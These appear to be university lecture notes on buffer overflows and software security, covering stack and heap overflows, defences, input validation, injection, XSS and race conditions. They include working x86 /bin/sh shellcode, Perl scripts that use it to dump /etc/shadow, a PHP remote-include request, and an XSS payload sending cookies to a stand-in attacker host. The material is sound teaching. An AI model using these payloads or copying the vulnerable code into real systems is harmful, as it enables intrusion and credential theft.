Week 4 Buffer Overflow & Software Security Buffer Overflow • A very common attack mechanism o First widely used by the Morris Worm in 1988 • Prevention techniques known • Still of major concern o Legacy of buggy code in widely deployed operating systems and applications o Continued careless programming practices by programmers Buffer Overflow/Buffer Overrun A buffer overflow, also known as a buffer overrun, is defined in the NIST Glossary of Key Information Security Terms as follows: “A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system.” Buffer Overflow Basics • Programming error when a process attempts to store data beyond the limits of a fixed-sized buffer • Overwrites adjacent memory locations o Locations could hold other program variables, parameters, or program control flow data • Buffer could be located on the stack, in the heap, or in the data section of the process Consequences: • Corruption of program data • Unexpected transfer of control • Memory access violations • Execution of code chosen by attacker int main(int argc, char *argv[]) { int valid = FALSE; char str1[8]; char str2[8]; next_tag(str1); gets(str2); if (strncmp(str1, str2, 8) == 0) valid = TRUE; printf("buffer1: str1(%s), str2(%s), valid(%d)\n", str1, str2, valid); } (a) Basic buffer overflow C code $ cc -g -o buffer1 buffer1.c $ ./buffer1 START buffer1: str1(START), str2(START), valid(1) $ ./buffer1 EVILINPUTVALUE buffer1: str1(TVALUE), str2(EVILINPUTVALUE), valid(0) $ ./buffer1 BADINPUTBADINPUT buffer1: str1(BADINPUT), str2(BADINPUTBADINPUT), valid(1) (b) Basic buffer overflow example runs Figure 10.1 Basic Buffer Overflow Example Memory Address Before gets(str2) After gets(str2) .... .... .... bffffbf4 34fcffbf 4... 01000000 .... c6bd0340 ...@ 08fcffbf .... 00000000 .... 80640140 .d.@ 54001540 T..@ 53544152 STAR 00850408 .... 30561540 0V.@ 34fcffbf 3... 01000000 .... c6bd0340 ...@ 08fcffbf .... 01000000 .... 00640140 .d.@ 4e505554 NPUT 42414449 BADI 4e505554 NPUT 42414449 BADI .... .... bffffbf0 bffffbec bffffbe8 bffffbe4 bffffbe0 bffffbdc bffffbd8 bffffbd4 bffffbd0 .... Contains Value of argv argc return addr old base ptr valid str1[4-7] str1[0-3] str2[4-7] str2[0-3] Figure 10.2 Basic Buffer Overflow Stack Values Buffer Overflow Attacks • To exploit a buffer overflow an attacker needs: • • • To identify a buffer overflow vulnerability in some program that can be triggered using externally sourced data under the attacker’s control To understand how that buffer is stored in memory and determine potential for corruption Identifying vulnerable programs can be done by: • • • Inspection of program source Tracing the execution of programs as they process oversized input Using tools such as fuzzing to automatically identify potentially vulnerable programs Programming Language History • At the machine level data manipulated by machine instructions executed by the computer processor are stored in either the processor’s registers or in memory • Assembly language programmer is responsible for the correct interpretation of any saved data value Modern high-level languages have a strong notion of type and valid operations • Not vulnerable to buffer overflows • Does incur overhead, some limits on use C and related languages have high-level control structures, but allow direct access to memory • Hence are vulnerable to buffer overflow • Have a large legacy of widely used, unsafe, and hence vulnerable code Stack Buffer Overflows • Occur when buffer is located on stack • Also referred to as stack smashing • Used by Morris Worm • Exploits included an unchecked buffer overflow • Are still being widely exploited • Stack frame • When one function calls another it needs somewhere to save the return address • Also needs locations to save the parameters to be passed in to the called function and to possibly save register values P: Return Addr Old Frame Pointer param 2 param 1 Q: Return Addr in P Old Frame Pointer Frame Pointer local 1 local 2 Stack Pointer Figure 10.3 Example Stack Frame with Functions P and Q Process image in main memory Top of Memory Kernel Code and Data Stack Spare Memory Program File Heap Global Data Global Data Program Machine Code Program Machine Code Process Control Block Bottom of Memory Figure 10.4 Program Loading into Process Memory void hello(char *tag) { char inp[16]; printf("Enter value for %s: ", tag); gets(inp); printf("Hello your %s is %s\n", tag, inp); } (a) Basic stack overflow C code $ cc -g -o buffer2 buffer2.c $ ./buffer2 Enter value for name: Bill and Lawrie Hello your name is Bill and Lawrie buffer2 done $ ./buffer2 Enter value for name: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Segmentation fault (core dumped) $ perl -e 'print pack("H*", "414243444546474851525354555657586162636465666768 08fcffbf948304080a4e4e4e4e0a");' | ./buffer2 Enter value for name: Hello your Re?pyy]uEA is ABCDEFGHQRSTUVWXabcdefguyu Enter value for Kyyu: Hello your Kyyu is NNNN Segmentation fault (core dumped) (b) Basic stack overflow example runs Figure 10.5 Basic Stack Overflow Example Memory Address Before gets(inp) After gets(inp) .... .... .... bffffbe0 3e850408 >... f0830408 .... e8fbffbf .... 60840408 `... 30561540 0V.@ 1b840408 .... e8fbffbf .... 3cfcffbf <... 34fcffbf 4... 00850408 .... 94830408 .... e8ffffbf .... 65666768 efgh 61626364 abcd 55565758 UVW X 51525354 QRST 45464748 EFGH 41424344 ABCD .... .... bffffbdc bffffbd8 bffffbd4 bffffbd0 bffffbcc bffffbc8 bffffbc4 bffffbc0 .... Contains Value of tag return addr old base ptr inp[12-15] inp[8-11] inp[4-7] inp[0-3] Figure 10.6 Basic Stack Overflow Stack Values void getinp(char *inp, int siz) { puts("Input value: "); fgets(inp, siz, stdin); printf("buffer3 getinp read %s\n", inp); } void display(char *val) { char tmp[16]; sprintf(tmp, "read val: %s\n", val); puts(tmp); } int main(int argc, char *argv[]) { char buf[16]; getinp(buf, sizeof(buf)); display(buf); printf("buffer3 done\n"); } (a) Another stack overflow C code $ cc -o buffer3 buffer3.c $ ./buffer3 Input value: SAFE buffer3 getinp read SAFE read val: SAFE buffer3 done $ ./buffer3 Input value: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX buffer3 getinp read XXXXXXXXXXXXXXX read val: XXXXXXXXXXXXXXX buffer3 done Segmentation fault (core dumped) (b) Another stack overflow example runs Table 10.2 Some Common Unsafe C Standard Library Routines Table 10.2 Some Common Unsafe C Standard Library Routines gets(char *str) read line from standard input into str sprintf(char *str, char *format, ...) create str according to supplied format and variables strcat(char *dest, char *src) append contents of string src to string dest strcpy(char *dest, char *src) copy contents of string src to string dest vsprintf(char *str, char *fmt, va_list ap) create str according to supplied format and variables Shellcode • Code supplied by attacker • Often saved in buffer being overflowed • Traditionally transferred control to a user command-line interpreter (shell) • Machine code • Specific to processor and operating system • Traditionally needed good assembly language skills to create • More recently a number of sites and tools have been developed that automate this process • Metasploit Project • Provides useful information to people who perform penetration, IDS signature development, and exploit research Figure 10.8 Example UNIX Shellcode int main(int argc, char *argv[]) { char *sh; char *args[2]; sh = "/bin/sh"; args[0] = sh; args[1] = NULL; execve(sh, args, NULL); } (a) Desired shellcode code in C nop nop / / end of nop sled jmp find // jump to end of code cont: pop %esi // pop address of sh off stack into %esi xor %eax,%eax // zero contents of EAX mov %al,0x7(%esi) // copy zero byte to end of string sh (%esi) lea (%esi),%ebx // load address of sh (%esi) into %ebx mov %ebx,0x8(%esi) // save address of sh in args[0] (%esi+8) mov %eax,0xc(%esi) // copy zero to args[1] (%esi+c) mov $0xb,%al // copy execve syscall number (11) to AL mov %esi,%ebx // copy address of sh (%esi) t0 %ebx lea 0x8(%esi),%ecx // copy address of args (%esi+8) to %ecx lea 0xc(%esi),%edx // copy address of args[1] (%esi+c) to %edx int $0x80 / / software interrupt to execute syscall find: call cont // call cont which saves next address on stack sh: .string "/bin/sh " // string constant args: .long 0 / / space used for args array .long 0 / / args[1] and also NULL for env array (b) Equivalent position-independent x86 assembly code 90 90 eb 1a 5e 31 c0 88 46 07 8d 1e 89 5e 08 89 46 0c b0 0b 89 f3 8d 4e 08 8d 56 0c cd 80 e8 e1 ff ff ff 2f 62 69 6e 2f 73 68 20 20 20 20 20 20 (c) Hexadecimal values for compiled x86 machine code Some Common x86 Assembly Language Instructions MOV src, dest copy (move) value from src into dest LEA src, dest copy the address (load effective address) of src into dest ADD / SUB src, dest add / sub value in src from dest leaving result in dest AND / OR / XOR src, dest logical and / or / xor value in src with dest leaving result in dest CMP val1, val2 compare val1 and val2, setting CPU flags as a result JMP / JZ / JNZ addr jump / if zero / if not zero to addr PUSH src push the value in src onto the stack POP dest pop the value on the top of the stack into dest CALL addr call function at addr LEAVE clean up stack frame before leaving function RET return from function INT num software interrupt to access operating system function NOP no operation or do nothing instruction Some x86 Registers 32 bit 16 bit %ax 8 bit (high) %ah 8 bit (low) %al %eax %ebx %bx %bh %bl %ecx %edx %cx %dx %ch %dh %cl %dl %ebp %eip %esi %esp Use Accumulators used for arithmetical and I/O operations and execute interrupt calls Base registers used to access memory, pass system call arguments and return values Counter registers Data registers used for arithmetic operations, interrupt calls and IO operations Base Pointer containing the address of the current stack frame Instruction Pointer or Program Counter containing the address of the next instruction to be executed Source Index register used as a pointer for string or array operations Stack Pointer containing the address of the top of stack $ dir -l buffer4 -rwsr-xr-x 1 root knoppix 16571 Jul 17 10:49 buffer4 $ whoami knoppix $ cat /etc/shadow cat: /etc/shadow: Permission denied $ cat attack1 perl -e 'print pack("H*", "90909090909090909090909090909090" . "90909090909090909090909090909090" . "9090eb1a5e31c08846078d1e895e0889" . "460cb00b89f38d4e088d560ccd80e8e1" . "ffffff2f62696e2f7368202020202020" . "202020202020202038f cffbfc0fbffbf0a"); print "whoami\n"; print "cat /etc/shadow\n";' $ attack1 | buffer4 Enter value for name: Hello your yyy)DA0Apy is e?^1AFF.../bin/sh... root root:$1$rNLId4rX$nka7JlxH7.4UJT4l9JRLk1:13346:0:99999:7::: daemon:*:11453:0:99999:7::: ... nobody:*:11453:0:99999:7::: knoppix:$1$FvZSBKBu$EdSFvuuJdKaCH8Y0IdnAv/:13346:0:99999:7::: ... Figure 10.9 Example Stack Overflow Attack Stack Overflow Variants Target program can be: Shellcode functions A trusted system utility Launch a remote shell when connected to Network service daemon Commonly used library code Create a reverse shell that connects back to the hacker Use local exploits that establish a shell Flush firewall rules that currently block other attacks Break out of a chroot (restricted execution) environment, giving full access to the system Buffer Overflow Defenses • Buffer overflows are widely exploited Two broad defense approaches Compile-time Run-time Aim to harden programs to resist attacks in new programs Aim to detect and abort attacks in existing programs Compile-Time Defenses: Programming Language • Use a modern high-level language • Not vulnerable to buffer overflow attacks • Compiler enforces range checks and permissible operations on variables Disadvantages • Additional code must be executed at run time to impose checks • Flexibility and safety comes at a cost in resource use • Distance from the underlying machine language and architecture means that access to some instructions and hardware resources is lost • Limits their usefulness in writing code, such as device drivers, that must interact with such resources Compile-Time Defenses: Safe Coding Techniques • C designers placed much more emphasis on space efficiency and performance considerations than on type safety • Assumed programmers would exercise due care in writing code • Programmers need to inspect the code and rewrite any unsafe coding • An example of this is the OpenBSD project • Programmers have audited the existing code base, including the operating system, standard libraries, and common utilities int copy_buf(char *to, int pos, char *from, int len) { int i; • This has resulted in what is widely regarded as one of the safest operating systems in widespread use for (i=0; i<len; i++) { to[pos] = from[i]; pos++; } return pos; } (a) Unsafe byte copy short read_chunk(FILE fil, char *to) { short len; fread(&len, 2, 1, fil); ................................ .................. /* read length of binary data */ fread(to, 1, len, fil); ................................ .................... /* read len bytes of binary data return len; } (b) Unsafe byte input Figure 10.10 Examples of Unsafe C Code Compile-Time Defenses: Language Extensions/Safe Libraries • Handling dynamically allocated memory is more problematic because the size information is not available at compile time o Requires an extension and the use of library routines • Programs and libraries need to be recompiled • Likely to have problems with third-party applications • Concern with C is use of unsafe standard library routines o One approach has been to replace these with safer variants • • Libsafe is an example Library is implemented as a dynamic library arranged to load before the existing standard libraries Compile-Time Defenses: Stack Protection • Add function entry and exit code to check stack for signs of corruption • Use random canary o Value needs to be unpredictable o Should be different on different systems • Stackshield and Return Address Defender (RAD) o GCC extensions that include additional function entry and exit code • Function entry writes a copy of the return address to a safe region of memory • Function exit code checks the return address in the stack frame against the saved copy • If change is found, aborts the program Run-Time Defenses: Executable Address Space Protection Use virtual memory support to make some regions of memory non-executable • Requires support from memory management unit (MMU) • Long existed on SPARC / Solaris systems • Recent on x86 Linux/Unix/Windows systems Issues • Support for executable stack code • Special provisions are needed Run-Time Defenses: Address Space Randomization • Manipulate location of key data structures o Stack, heap, global data o Using random shift for each process o Large address range on modern systems means wasting some has negligible impact • Randomize location of heap buffers • Random location of standard library functions Run-Time Defenses: Guard Pages • Place guard pages between critical regions of memory o Flagged in MMU as illegal addresses o Any attempted access aborts process • Further extension places guard pages Between stack frames and heap buffers o Cost in execution time to support the large number of page mappings necessary Replacement Stack Frame Variant that overwrites buffer and saved frame pointer address •Saved frame pointer value is changed to refer to a dummy stack frame •Current function returns to the replacement dummy frame •Control is transferred to the shellcode in the overwritten buffer Off-by-one attacks Defenses •Coding error that allows one more byte to be copied than there is space available •Any stack protection mechanisms to detect modifications to the stack frame or return address by function exit code •Use non-executable stacks •Randomization of the stack in memory and of system libraries Return to System Call • Defenses o Any stack protection mechanisms to detect modifications to the stack frame or return address by function exit code o Use non-executable stacks o Randomization of the stack in memory and of system libraries • Stack overflow variant replaces return address with standard library function o Response to non-executable stack defenses o Attacker constructs suitable parameters on stack above return address o Function returns and library function executes o Attacker may need exact buffer address o Can even chain two library calls Heap Overflow • Attack buffer located in heap o Typically located above program code o Memory is requested by programs to use in dynamic data structures (such as linked lists of records) • No return address o Hence no easy transfer of control o May have function pointers can exploit o Or manipulate management data structures Defenses • Making the heap non-executable • Randomizing the allocation of memory on the heap /* record type to allocate on heap */ typedef struct chunk { char inp[64]; ................................ ................................ ................................ ................. ................................ ................................ ............................ /* vulnerable input buffer */ void (*process)(char *); ................................ . /* pointer to function to process inp */ } chunk_t; void showlen(char *buf) { int len; len = strlen(buf); printf("buffer5 read %d chars\n", len); } int main(int argc, char *argv[]) { chunk_t *next; setbuf(stdin, NULL); next = malloc(sizeof(chunk_t)); next->process = showlen; printf("Enter value: "); gets(next->inp); next->process(next->inp); printf("buffer5 done\n"); } $ cat attack2 #!/bin/sh # implement heap overflow against program buffer5 perl -e 'print pack("H*", "90909090909090909090909090909090" . "9090eb1a5e31c08846078d1e895e0889" . "460cb00b89f38d4e088d560ccd80e8e1" . "ffffff2f62696e2f7368202020202020" . "b89704080a"); print "whoami\n"; print "cat /etc/shadow\n";' (a) Vulnerable heap overflow C code $ cat attack2 #!/bin/sh # implement heap overflow against program buffer5 perl -e 'print pack("H*", "90909090909090909090909090909090" . "9090eb1a5e31c08846078d1e895e0889" . "460cb00b89f38d4e088d560ccd80e8e1" . "ffffff2f62696e2f7368202020202020" . "b89704080a"); print "whoami\n"; print "cat /etc/shadow\n";' $ attack2 | buffer5 Enter value: root root:$1$4oInmych$T3BVS2E3OyNRGjGUzF4o3/:13347:0:99999:7::: daemon:*:11453:0:99999:7::: $ attack2 | buffer5 Enter value: root root:$1$4oInmych$T3BVS2E3OyNRGjGUzF4o3/:13347:0:99999:7::: daemon:*:11453:0:99999:7::: ... nobody:*:11453:0:99999:7::: knoppix:$1$p2wziIML$/yVHPQuw5kvlUFJs3b9aj/:13347:0:99999:7::: ... (b) Example heap overflow attack Figure 10.11 Example Heap Overflow Attack Chapter 11 Software Security • Many vulnerabilities result from poor programming practices • Consequence from insufficient checking and validation of data and error codes o Awareness of these issues is a critical initial step in writing more secure program code Software error categories: • Insecure interaction between components • Risky resource management • Porous defenses Table 11.1 CWE/SANS TOP 25 Most Dangerous Software Errors (2011) Software Security, Quality and Reliability • Software quality and reliability: o Concerned with the accidental failure of program as a result of some theoretically random, unanticipated input, system interaction, or use of incorrect code o Improve using structured design and testing to identify and eliminate as many bugs as possible from a program o Concern is not how many bugs, but how often they are triggered • Software security: o Attacker chooses probability distribution, specifically targeting bugs that result in a failure that can be exploited by the attacker o Triggered by inputs that differ dramatically from what is usually expected o Unlikely to be identified by common testing approaches Defensive Programming • Designing and implementing software so that it continues to function even when under attack • Requires attention to all aspects of program execution, environment, and type of data it processes • Software is able to detect erroneous conditions resulting from some attack • Also referred to as secure programming • Key rule is to never assume anything, check all assumptions and handle any possible error states Computer System Program executing algorithm, processing input data, generating output Network Link GUI Display Keyboard & Mouse File System Other Programs DBMS Operating System Machine Hardware Figure 11.1 Abstract View of Program Database Defensive Programming • Programmers often make assumptions about the type of inputs a program will receive and the environment it executes in o Assumptions need to be validated by the program and all potential failures handled gracefully and safely • Requires a changed mindset to traditional programming practices o Programmers have to understand how failures can occur and the steps needed to reduce the chance of them occurring in their programs • Conflicts with business pressures to keep development times as short as possible to maximize market advantage Incorrect handling is a very common failing Input is any source of data from outside and whose value is not explicitly known by the programmer when the code was written Must identify all data sources Explicitly validate assumptions on size and type of values before use Input Size & Buffer Overflow • Programmers often make assumptions about the maximum expected size of input o Allocated buffer size is not confirmed o Resulting in buffer overflow • Testing may not identify vulnerability o Test inputs are unlikely to include large enough inputs to trigger the overflow • Safe coding treats all input as dangerous Interpretation of Program Input • Program input may be binary or text o Binary interpretation depends on encoding and is usually application specific • There is an increasing variety of character sets being used o Care is needed to identify just which set is being used and what characters are being read • Failure to validate may result in an exploitable vulnerability • 2014 Heartbleed OpenSSL bug is a recent example of a failure to check the validity of a binary input value……. Heartbleed Buffer Overread The Heartbleed bug is in OpenSSL’s TLS heartbeat to verify that a connection is still open by sending some sort of arbitrary message and expecting a response to it. When a TLS heartbeat is sent, it comes with a couple notable pieces of information: • Some arbitrary payload data. This is intended to be repeated back to the sender so the sender can verify the connection is still alive and the right data is being transmitted through the communication channel. • The length of that data, in bytes (16 bit unsigned int). We’ll call it len_payload. The OpenSSL implementation used to do the following: • • • Allocate a heartbeat response, using len_payload as the intended payload size memcpy() len_payload bytes from the payload into the response. Send the heartbeat response (with all len_payload bytes) happily back to the original sender. The problem is that the OpenSSL implementation never bothered to check that len_payload is actually correct, and that the request actually has that many bytes of payload. So, a malicious person could send a heartbeat request indicating a payload length of up to 2^16 (65536), but actually send a shorter payload. What happens in this case is that memcpy ends up copying beyond the bounds of the payload into the response, giving up to 64k of OpenSSL’s memory contents to an attacker int). Heartbleed Buffer Overread It appears that this never actually segfaults because OpenSSL has a custom implementation of malloc that is enabled by default. So, the next memory addresses out of bounds of the received request are likely part of a big chunk of memory that custom memory allocator is managing and thus would never be caught by the OS as a segmentation violation. memcpy(bp, pl, payload); memcpy is a command that copies data, and it requires three pieces of information to do the job; those are the terms in the parentheses. The first bit of info is the final destination of the data that needs to be copied. The second is the location of the data that needs to be copied. The third is the amount of data the computer is going to to find when it goes to make that copy. In this case, the bp is a place on the server computer, pl is where the actual data the client sent as a heartbeat is, and payload is a number that says how big pl is. The important thing to know here is that copying data on computers is trickier than it seems because there's really no such thing as "empty" memory. So bp, the spot where the client data is going to be copied, is not actually empty. Instead it is full of whatever data was sitting in that part of the computer before. The computer just treats it as empty because that data has been marked for deletion. Until it's filled up with new data, the destination bp is a bunch of old data that has been OK'd to be overwritten. It is still there however……. • Flaws relating to invalid handling of input data, specifically when program input data can accidentally or deliberately influence the flow of execution of the program Most often occur in scripting languages • Encourage reuse of other programs and system utilities where possible to save coding effort • Often used as Web CGI scripts 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 #!/usr/bin/perl # finger.cgi - finger CGI script using Perl5 CGI module use CGI; use CGI::Carp qw(fatalsToBrowser); $q = new CGI; # create query object # display HTML header print $q->header, $q->start_html('Finger User'), $q->h1('Finger User'); print "<pre>"; # get name of user and display their finger details $user = $q->param("user"); print `/usr/bin/finger -sh $user`; # display HTML footer print "</pre>"; print $q->end_html; (a) Unsafe Perl finger CGI script <html><head><title>Finger User</title></head><body> <h1>Finger User</h1> <form method=post action="finger.cgi"> <b>Username to finger</b>: <input type=text name=user value=""> <p><input type=submit value="Finger User"> </form></body></html> (b) Finger User Login Name lpb Lawrie Brown Finger User attack success -rwxr-xr-x 1 lpb -rw-r--r-1 lpb TTY p0 staff staff Finger form Idle Login Sat Time Where 15:24 ppp41.grapevine 537 Oct 21 16:19 finger.cgi 251 Oct 21 16:14 finger.html (c) Expected and subverted finger CGI responses 14 15 16 17 18 # get name of user and display their finger details $user = $q->param("user"); die "The specified user contains illegal characters!" unless ($user =~ /^\w+$/); print `/usr/bin/finger -sh $user`; (d) Safety extension to Perl finger CGI script Figure 11.2 A Web CGI Injection Attack $name = $_REQUEST['name']; $query = “SELECT * FROM suppliers WHERE name = '" . $name . "';" $result = mysql_query($query); (a) Vulnerable PHP code $name = $_REQUEST['name']; $query = “SELECT * FROM suppliers WHERE name = '" . mysql_real_escape_string($name) . "';" $result = mysql_query($query); (b) Safer PHP code Figure 11.3 SQL Injection Example <?php include $path . 'functions.php'; include $path . 'data/prefs.php'; … (a) Vulnerable PHP code GET /calendar/embed/day.php?path=http://hacker.web.site/hack.txt?&cmd=ls (b) HTTP exploit request Figure 11.4 PHP Code Injection Example Commonly seen in scripted Web applications Attacks where input provided by one user is subsequently output to another user • Vulnerability involves the inclusion of script code in the HTML content • Script code may need to access data associated with other pages • Browsers impose security checks and restrict data access to pages originating from the same site Exploit assumption that all content from one site is equally trusted and hence is permitted to interact with other content from the site XSS reflection vulnerability • Attacker includes the malicious script content in data supplied to a site Thanks for this information, its great! <script>document.location='http://hacker.web.site/cookie.cgi?'+ document.cookie</script> (a) Plain XSS example Thanks for this information, its great! &#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62; &#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116; &#46;&#108;&#111;&#99;&#97;&#116;&#105;&#111; &#110;&#61;&#39;&#104;&#116;&#116;&#112;&#58; &#47;&#47;&#104;&#97;&#99;&#107;&#101;&#114; &#46;&#119;&#101;&#98;&#46;&#115;&#105;&#116; &#101;&#47;&#99;&#111;&#111;&#107;&#105;&#101; &#46;&#99;&#103;&#105;&#63;&#39;&#43;&#100; &#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46; &#99;&#111;&#111;&#107;&#105;&#101;&#60;&#47; &#115;&#99;&#114;&#105;&#112;&#116;&#62; (b) Encoded XSS example Figure 11.5 XSS Example Validating Input Syntax It is necessary to ensure that data conform with any assumptions made about the data before subsequent use Input data should be compared against what is wanted Alternative is to compare the input data with known dangerous values By only accepting known safe data the program is more likely to remain secure May have multiple means of encoding text Unicode used for internationalization •Uses 16-bit value for characters •UTF-8 encodes as 1-4 byte sequences •Many Unicode decoders accept any valid equivalent sequence Growing requirement to support users around the globe and to interact with them using their own languages Canonicalization •Transforming input data into a single, standard, minimal representation •Once this is done the input data can be compared with a single representation of acceptable input values • Additional concern when input data represents numeric values • Internally stored in fixed sized value o 8, 16, 32, 64-bit integers o Floating point numbers depend on the processor used o Values may be signed or unsigned • Must correctly interpret text form and process consistently o Have issues comparing signed to unsigned o Could be used to thwart buffer overflow check Input Fuzzing • Developed by Professor Barton Miller at the University of Wisconsin Madison in 1989 • Software testing technique that uses randomly generated data as inputs to a program o Range of inputs is very large o Intent is to determine if the program or function correctly handles abnormal inputs o Simple, free of assumptions, cheap o Assists with reliability as well as security • Can also use templates to generate classes of known problem inputs o Disadvantage is that bugs triggered by other forms of input would be missed o Combination of approaches is needed for reasonably comprehensive coverage of the inputs Writing Safe Program Code • Second component is processing of data by some algorithm to solve required problem • High-level languages are typically compiled and linked into machine code which is then directly executed by the target processor Security issues: • Correct algorithm implementation • Correct machine instructions for algorithm • Valid manipulation of data Issue of good program development technique Algorithm may not correctly handle all problem variants Consequence of deficiency is a bug in the resulting program that could be exploited Initial sequence numbers used by many TCP/IP implementations are too predictable Combination of the sequence number as an identifier and authenticator of packets and the failure to make them sufficiently unpredictable enables the attack to occur Another variant is when the programmers deliberately include additional code in a program to help test and debug it Often code remains in production release of a program and could inappropriately release information May permit a user to bypass security checks and perform actions they would not otherwise be allowed to perform This vulnerability was exploited by the Morris Internet Worm Ensuring Machine Language Corresponds to Algorithm • Issue is ignored by most programmers o Assumption is that the compiler or interpreter generates or executes code that validly implements the language statements • Requires comparing machine code with original source o Slow and difficult • Development of computer systems with very high assurance level is the one area where this level of checking is required o Specifically Common Criteria assurance level of EAL 7 Correct Use of Memory • Issue of dynamic memory allocation o Used to manipulate unknown amounts of data o Allocated when needed, released when done • Memory leak o Steady reduction in memory available on the heap to the point where it is completely exhausted • Many older languages have no explicit support for dynamic memory allocation o Use standard library routines to allocate and release memory • Modern languages handle automatically Race Conditions • • • Without synchronization of accesses it is possible that values may be corrupted or changes lost due to overlapping access, use, and replacement of shared values Arise when writing concurrent code whose solution requires the correct selection and use of appropriate synchronization primitives Deadlock o Processes or threads wait on a resource held by the other o One or more programs has to be terminated Operating System Interaction • Programs execute on systems under the control of an operating system o Mediates and shares access to resources o Constructs execution environment o Includes environment variables and arguments • Systems have a concept of multiple users o Resources are owned by a user and have permissions granting access with various rights to different categories of users o Programs need access to various resources, however excessive levels of access are dangerous o Concerns when multiple programs access shared resources such as a common file Environment Variables • Collection of string values inherited by each process from its parent o Can affect the way a running process behaves o Included in memory when it is constructed • Can be modified by the program process at any time o Modifications will be passed to its children • • Another source of untrusted program input Most common use is by a local user attempting to gain increased privileges o Goal is to subvert a program that grants superuser or privileges administrator #!/bin/bash user=`echo $1 | sed 's/@.*$//'` grep $user /var/local/accounts/ipaddrs (a) Example vulnerable privileged shell script #!/bin/bash PATH=”/sbin:/bin:/usr/sbin:/usr/bin” export PATH user=`echo $1 | sed 's/@.*$//'` grep $user /var/local/accounts/ipaddrs (b) Still vulnerable privileged shell script Figure 11.6 Vulnerable Shell Scripts Programs can be vulnerable to PATH variable manipulation • Must reset to “safe” values If dynamically linked may be vulnerable to manipulation of LD_LIBRARY_PATH • Used to locate suitable dynamic library • Must either statically link privileged programs or prevent use of this variable Privilege escalation •Exploit of flaws may give attacker greater privileges Least privilege •Run programs with least privilege needed to complete their function Determine appropriate user and group privileges required •Decide whether to grant extra user or just group privileges Ensure that privileged program can modify only those files and directories necessary Programs with root/ administrator privileges are a major target of attackers Often privilege is only needed at start Good design partitions complex programs in smaller modules with needed privileges •They provide highest levels of system access and control •Are needed to manage access to protected system resources •Can then run as normal user •Provides a greater degree of isolation between the components •Reduces the consequences of a security breach in one component •Easier to test and verify System Calls and Standard Library Functions Programmers make assumptions about their operation Programs use system calls and standard library functions for common operations • If incorrect behavior is not what is expected • May be a result of system optimizing access to shared resources • Results in requests for services being buffered, resequenced, or otherwise modified to optimize system use • Optimizations can conflict with program goals patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, … ] open file for writing for each pattern seek to start of file overwrite file contents with pattern close file remove file (a) Initial secure file shredding program algorithm patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, … ] open file for update for each pattern seek to start of file overwrite file contents with pattern flush application write buffers sync file system write buffers with device close file remove file (b) Better secure file shredding program algorithm Figure 11.7 Example Global Data Overflow Attack • • • Programs may need to access a common system resource Need suitable synchronization mechanisms o Most common technique is to acquire a lock on the shared file Lockfile o Process must create and own the lockfile in order to gain access to the shared resource o Concerns • If a program chooses to ignore the existence of the lockfile and access the shared resource the system will not prevent this • All programs using this form of synchronization must cooperate • Implementation #!/usr/bin/perl # $EXCL_LOCK = 2; $UNLOCK = 8; $FILENAME = “forminfo.dat”; # open data file and acquire exclusive access lock open (FILE, ">> $FILENAME") || die "Failed to open $FILENAME \n"; flock FILE, $EXCL_LOCK; … use exclusive access to the forminfo file to save details # unlock and close file flock FILE, $UNLOCK; close(FILE); Figure 11.8 Perl File Locking Example • • • • Many programs use temporary files Often in common, shared system area Must be unique, not accessed by others Commonly create name using process ID o Unique, but predictable o Attacker might guess and attempt to create own file • between program checking and creating Secure temporary file creation and use requires the use of random names Programs may use functionality and services of other programs • Security vulnerabilities can result unless care is taken with this interaction • Such issues are of particular concern when the program being used did not adequately identify all the security concerns that might arise • Occurs with the current trend of providing Web interfaces to programs • Burden falls on the newer programs to identify and manage any security issues that may arise Issue of data confidentiality/integrity Detection and handling of exceptions and errors generated by interaction is also important from a security perspective The lab • 4. Debugging and Exploit Development • 4.1 Debugging Fundamentals • 4.2 • • • • • • • • • • • 4.1.1 Opening and Attaching to the debugging target application 4.1.2 The OllyDbg CPU view 4.1.3 The 20 second guide to X86 assembly language for exploit writers 4.2.1 4.2.2 4.2.3 4.2.4 4.2.5 4.2.6 Exploit Development with OllyDbg Methods for directing code execution in the debugger The SEH Chain Searching for commands Searching through memory Working in the memory dump Editing code, memory and registers